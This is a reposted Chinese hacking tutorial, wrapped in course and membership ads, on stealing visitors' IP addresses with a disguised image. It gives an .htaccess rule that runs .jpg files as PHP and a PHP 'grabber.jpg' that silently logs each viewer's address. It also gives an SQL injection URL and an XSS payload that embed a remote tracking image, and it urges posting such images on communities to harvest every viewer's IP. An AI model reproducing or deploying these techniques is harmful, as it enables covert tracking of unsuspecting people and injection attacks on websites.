免费加入嵌入式项目实战群(送开发板),
请加良许微信:coderliangxu-8
链接:http://www.freebuf.com/articles/database/101233.html
在本教程中,我们将学习如何用一张照片来盗取ip地址。我的想法是通过修改.htaccess文件,将jpg文件当作php文件来解析。
下面就是我们需要向.htaccess中添加的代码:
AddHandler application/x-httpd-php5 .jpg然后将下面的代码复制到记事本中,命名为grabber.jpg
<?php
$fh = fopen('ip_list.txt', 'a');
fwrite($fh, $_SERVER['REMOTE_ADDR']."
");
fclose($fh);
$im = imagecreatefromjpeg("n00b.png");
header('Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>将grabber.jpg的权限设置为755,然后再找一张照片,将其命名为n00b.png,接着放到与grabber.jpg相同的目录之中。
就这样,一切工作就绪了。当别人浏览grabber.jpg这张照片的时候,他的ip地址就会被记录下来。
(译者注:需要把这些东西上传至我们的个人网站空间中)
POC:
(译者注:作者这里贴了一张可获取ip的演示照片,为了大家的隐私,我没有将其贴出,读者可自行去作者博客查看)
至此,我们的照片已经可以开始工作了。
接着我还想说明一下如何使用SQLi来获取ip地址。其实使用照片来盗取ip地址十分快捷,我们没有理由去使用SQLi这种方法,但是为了让读者获取到更多的知识,我还是说明一下吧:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#现在,再说一下如何使用xss来获取ip地址:
http://leettime.net/xsslab1/chalg1.php?name=<img src="http://leettime.net/idiots_test_lab/imageip/tryme.jpg">&submit=Search好了,就是这些了。
我们可以用这个技巧做许多有趣的事情,事实上大部分社区都允许我们发布一些照片,所以我们可以用这个方法去获取所有访问到我们照片的人的ip地址。
谢谢您的阅读,Happy Hacking!
良许花了一个半月的时间研发了一门 Linux 命令课程,欢迎购买学习!
课程特色:
详细总结 150个高频使用命令,学完可应对工作中 95%命令需求;
答疑群提供无限次答疑服务,答疑群氛围很好;
总时长超 10小时,媲美大课时长。
长按下方卡片购买
强烈推荐一位腾讯大佬录制的 Shell 实战案例课程(已获授权):
大佬在腾讯工作 6 年,在大厂工作十几年,经验丰富;
大佬根据自己在大厂工作经验总结了 100个案例,超级实用!
学完这 100个案例,肯定对自己的 Shell 编程有很大的提升;
答疑群提供无限次答疑服务,答疑群氛围很好。
长按下方卡片购买
限 时 特 惠: 本站每日持续更新海量各大内部创业教程,一年会员只需98元,全站资源免费下载 点击查看详情
站 长 微 信: lzxmw777声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
